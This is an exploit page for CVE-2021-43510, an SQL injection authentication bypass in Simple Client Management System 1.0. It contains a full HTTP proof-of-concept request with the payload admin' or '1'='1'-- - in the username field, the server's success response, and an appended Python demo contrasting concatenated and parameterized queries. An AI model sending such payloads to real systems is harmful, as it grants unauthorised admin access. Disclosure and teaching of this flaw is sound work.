CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.


# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)

# Date: 27/01/2022

# Exploit Author: Rahul Kalnarayan (r4hn1)

# Vendor Homepage: https://www.sourcecodester.com/

# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

# Version: 1.0

# Category: Webapps

# Tested on: Apache2+MariaDB latest version

# Description: Simple Client Management System 1.0 suffers from an SQL injection vulnerability that allows an unauthenticated user to log in to the admin panel.

# CVE ID: CVE-2021-43510

Vulnerable Page: /crm/admin/

POC-Request

-----------------------------------

POST /cms/classes/Login.php?f=login HTTP/1.1
Host: 192.168.1.76
Content-Length: 31
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.76
Referer: http://192.168.1.76/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=admin'+or+'1'%3d'1'--+-&password=as

---------------------------------------

POC-Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2022 17:29:08 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}
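
The class of flaw behind this PoC, modelled as an added example (not code from the original page or from the application, which is PHP on MariaDB): a login query built by string concatenation next to the parameterized form that fixes it. The table layout, credentials, hash scheme and function names are assumptions, and SQLite stands in for the database.

```python
import hashlib
import sqlite3

# Decoded form of the username value in the PoC request ('+' is a space, %3d is '=').
POC_USERNAME = "admin' or '1'='1'-- -"

def digest(password):
    # Stand-in hash so the demo is self-contained; not a password-storage recommendation.
    return hashlib.sha256(password.encode()).hexdigest()

def make_db():
    """Constructed in-memory table; the schema and credentials are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", digest("correct-horse")))
    return db

def login_concat(db, username, password):
    """Flawed pattern: request fields become part of the SQL text."""
    sql = ("SELECT 1 FROM users WHERE username = '" + username +
           "' AND password = '" + digest(password) + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, username, password):
    """Fixed pattern: values are bound, so quotes in them stay data."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, digest(password))).fetchone() is not None

def compare(username, password):
    """Return (flawed_result, fixed_result) for one login attempt."""
    db = make_db()
    return login_concat(db, username, password), login_param(db, username, password)

if __name__ == "__main__":
    for user, pw in [("admin", "correct-horse"), ("admin", "as"), (POC_USERNAME, "as")]:
        print(repr(user), compare(user, pw))
```

With the concatenated query the quote in the username closes the string literal and the trailing comment marker discards the password check; with bound parameters the same input is compared as a literal username and matches no row.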
